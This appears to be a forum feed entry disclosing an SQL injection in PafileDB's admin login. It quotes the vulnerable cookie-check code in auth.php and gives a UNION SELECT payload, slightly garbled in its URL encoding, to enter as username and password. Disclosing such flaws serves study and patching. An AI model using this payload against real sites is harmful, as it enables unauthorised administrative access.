<![CDATA[Latest posts for the topic "PafileDB Login SQL Injection"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net PafileDB Login SQL Injection Vulnerable include/admin/auth.php Code Code:
if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this:
    
    $admininfo = array();
    if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) {
        //checkpass() returned true, so the user exists
        
        //$adminloggedin is a var used throughout the script to see if someone's logged in.
        $adminloggedin = true;
        $smarty->assign('admininfo', $admininfo[0]);
        
    } else { //The cookie exists, but the user/pass don't match
...
Username : 1%20union%20select%%20201,2,3,4/* Password : 1%20union%20select%%20201,2,3,4/* /]]>
/hvaonline/posts/list/5195.html#30520 /hvaonline/posts/list/5195.html#30520 GMT